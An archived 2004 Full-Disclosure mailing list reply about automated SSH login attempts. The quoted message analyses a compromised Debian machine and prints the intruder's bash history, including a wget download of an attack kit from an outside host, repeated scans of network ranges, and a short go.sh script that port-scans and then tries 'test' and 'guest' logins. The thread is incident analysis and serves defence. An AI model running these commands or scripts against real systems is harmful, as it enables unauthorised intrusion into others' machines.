| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: andrei at fq.ro (Andrei Galca-Vasiliu) Subject: Re: Automated SSH login attempts? By the way, you have to be root to use "ss": sweet@...rei:~/ssh$ ./go.sh 82.77.45 scanning network 82.77.*.* usec: 30000, burst packets 50 using inteface eth0 ERROR: UID != 0 Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek povestea: > Hmmm - I have also been getting those login attemps, but thought them to > be harmless. Maybe they are not *that* harmless, though... Today I > managed to get my hands on a machine that was originating such login > attempts. I must admit I am far from being a linux security expert, but > this is what I've found out up to now: > > Whoever broke into the machine did not take any attempts to cover up his > tracks - this is what I found in /root/.bash_history: > > ------ > id > uname -a > w > id > ls > wgte frauder.us/linux/ssh.tgz > wget frauder.us/linux/ssh.tgz > tar xzvf ssh.tgz > tar xvf ssh.tgz > ls > cd ssh > ls > ./go.sh 195.178 > ls > pico uniq.txt > vi uniq.txt > ls > rm -rf uniq.txt > ./go.sh 167.205 > ls > rm -rf uniq.txt vuln.txt > ./go.sh 202.148.20 > ./go.sh 212.92 > ./go.sh 195.197 > ./go.sh 147.32 > ./go.sh 213.168 > ./go.sh 134.176 > ./go.sh 195.83 > ------ > > um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two > binaries: > > go.sh: > ------- > ./ss 22 -b $1 -i eth0 -s 6 > cat bios.txt |sort | uniq > uniq.txt > ./sshf > ------- > > * 'ss' apparently is some sort of portscanner > * 'sshf' connects to every IP in uniq.txt and tries to log in as user > 'test' first, then as user 'guest' (according to tcpdump). > > This does not seem to be a stupid brute force attack, as there is only > one login attempt per user. Could it be that the tool tries to exploit > some vulnerability in the sshd, and just tries to look harmless by using > 'test' and 'guest' as usernames? > > The compromised machine was running an old debian woody installation > which had not been upgraded for at least one year, the sshd version > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' > > As already mentioned, I am far from being an expert, but if I can assist > in further testing, then let me know. Please CC me, I am not subscribed > to the list. > > cheers, > Stefan > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html -- *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-. Andrei Galca-Vasiliu Folio Q Advertising www.fq.ro Security is an illusion... *:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.
Powered by blists - more mailing lists